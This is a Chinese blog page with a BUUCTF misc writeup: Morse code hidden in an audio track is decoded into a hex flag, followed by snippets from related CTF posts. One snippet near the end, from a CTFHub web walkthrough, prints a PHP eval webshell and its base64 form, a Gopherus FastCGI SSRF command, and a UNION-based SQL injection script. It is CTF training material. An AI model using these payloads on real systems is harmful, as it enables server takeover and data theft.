BUUCTF 来首歌吧 writeup

最新推荐文章于 2025-04-09 16:42:25 发布
原创 最新推荐文章于 2025-04-09 16:42:25 发布 · 938 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#html

这篇博客讲述了作者如何分析一个音频文件,通过使用Audacity软件发现其内部隐藏的摩斯密码。经过放大和解读,确定这些短长段代表了摩斯密码,并解码出了一串十六进制字符串:5BC925649CB0188F52E617D70929191C。内容涉及到数字安全和信息隐藏技术。

下载后是一个音频文件,先听一下,啥也听不出来,用MP3Stego好像不行,那就扔到Audacity里面看一下。
在这里插入图片描述
这里上面显然使用东西的,但是好像是摩斯密码,但是又好像不是,这里需要按住Ctrl+滚轮放大。
在这里插入图片描述
原来的时候每一小段其实就是一个摩斯密码,但是因为太小所以就成一段了,放大后很明显是一组一组的长短小段,可能就是摩斯密码,但也有可能是01串,但是01串应该不会有间隔,所以十有八九是摩斯密码。莫斯密码是".-"串,这里短的是点,长的是上划线。

..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..--- ----. .---- ----. .---- -.-.

解出来就行了。

5BC925649CB0188F52E617D70929191C
buuctf—来首歌
weixin_52620919的博客
11-06 511
试一下摩斯密码 ..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..--- ----. .---- ----. .---- -.-. 解密: 5BC925649CB0188F52E617D70929191C 提交成功 ...
BUUCTF MISC 解题思路及实现过程
Shuras1223的博客
04-02 6389
buuctf misc 题解及答案
buuctf首歌
2301_76830653的博客
04-07 1343
听音乐过程中发现只有右声道有声音 我以为我耳机坏了,接着听 发现左声道有摩斯密码,用aducity打开音频。下载附件 发现是个音频,看题目是 “来首歌吧”,那就来一首吧。解码就行,解的码小写不行就换大写。放大,按长短记录摩斯密码。
BUUCTF首歌吧 1
YueXuan_521的博客
11-14 2402
BUUCTF首歌吧 1 按照这样的对应将音轨上的分组全部转译为莫尔斯电码,转换为“…-.-. ----. …- ----. -.-. -…----- .---- —…----- ----. …— ----. .---- ----. .---- -.-. ”。看到有两条音轨,放大上面的那条音轨,看到这一串音频,有很多分组,分组内由粗的音块和细的音块组成,类似莫尔斯电码的“-”和“.”。3、使用在线网站,将莫尔斯电码转换为明文字符,得到flag值。注意:得到的 flag 请包上 flag{} 提交。
BUUCTF:来首歌
末初 · mochu7
09-23 5926
题目地址:https://buuoj.cn/challenges#%E6%9D%A5%E9%A6%96%E6%AD%8C%E5%90%A7 使用audacity打开题目附件stego100.wav 摩斯密码 ..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..---
buuctf:来首歌
qq_57061511的博客
08-08 1725
下载解压后,得到一个WAV文件,用Audacity(声音编辑软件)打开,放大声波曲线,发现在声波上方有疑似摩斯密码的一段代码, 长柱代替摩斯密码中的 - ,短柱代替摩斯密码中的 . ,中间的长线段用空格代替,将代码翻译成摩斯密码, 解密即可得到flag ...
BUUCTF-MISC-来首歌
2301_80480838的博客
07-02 868
我们还用Audacity进行查看,发现在这首歌中有两个轨道。打开附件之后发现是一个音频文件。而上面那一条轨道正是莫斯密码。再转换一下就得到了flag。
buuctf--来首歌吧】
ncnfjdjjd的博客
02-07 794
Audacity
BUUCTF~Misc~Test2
m0_47643893的博客
02-02 1377
目录FLAG隐藏的钥匙假如给我三天光明最简单的misc-y1ngA_Beautiful_Picture神秘的龙卷风小姐姐-y1ng后门查杀荷兰宽带数据泄露来首歌吧数据包中的线索九连环面具下的flagwebshell后门被劫持的神秘礼物刷新过的图片Snake圣火昭昭-y1ng梅花香之苦寒来菜刀666总结 FLAG 在Stegsolve中发现有zip文件,导出之后发现压缩包文件损坏,我们用winrar修复文件,然和就可以解压了,看到是elf文件可能是逆向就用IDA打开然后就看到了flag flag{dd0gf4
NPUCTF 2020 Crypto writeup
Slightwind's Blog
04-24 3983
认清形势,建立信心 题目中给了 2e mod n2^e \ mod \ n2e mod n, 4e mod p4^e \ mod \ p4e mod p 和 8e mod p8^e \ mod \ p8e mod p。令它们分别为 ...
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几次真的心态崩溃。写一个记录贴。kali真的是个好东西。。 解决了的问题: kali忘了密码怎么办 kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1443
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
buuctfmisc excel谁赢了比赛
03-18
首先,我需要确认BUUCTF平台是否有公开的比赛记录或Writeup(解题报告),尤其是关于Excel相关的Misc题目。通常,CTF比赛的题目在赛后会有选手分享解题过程,这些信息可能分布在论坛、博客或GitHub上。例如,用户...
BUUCTF】MISC 来首歌
algae
05-08 8797
首歌吧 1 注意:得到的 flag 请包上 flag{} 提交
BUUCTF misc 专题(29)来首歌
tt_npc的博客
11-19 2033
题目应该是一首歌,下载打开压缩包 没错了,第一个想到的应该就是摩斯密码,可以将它放入音频软件,我这里直接使用的就是au了,可能会不太方便,你们可以参考其他大佬博客,使用相对方便的工具 将它转换出来 再进行摩斯密码解密 再将它包上flag就是答案了 flag{5BC925649CB0188F52E617D70929191C} ...
BUUCTF首歌吧1
weixin_53955759的博客
06-20 3260
下载附件得到一首wav的音乐,而且名字为stego100 那么就是用
BUUCTF首歌
Bnessy
03-25 479
下载附件是个.wav文件 打开听了听,像是只有右声道,用audacity打开看下,发现是摩斯密码 ..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..--- ----. .---- ----. .---- -.-. 解码得到flag ...
buuctf】来首歌
ywx05_的博客
01-31 270
一段音乐用audacity打开看看。小白一个,记录自己的刷题过程。放大后看到像是摩斯密码。
BUUCTF(Misc)——来首歌
weixin_74738833的博客
04-09 608
BUUCTF(Misc)——来首歌
writeup
最新发布
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

碧羽o(* ̄▽ ̄*)ブ回雪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值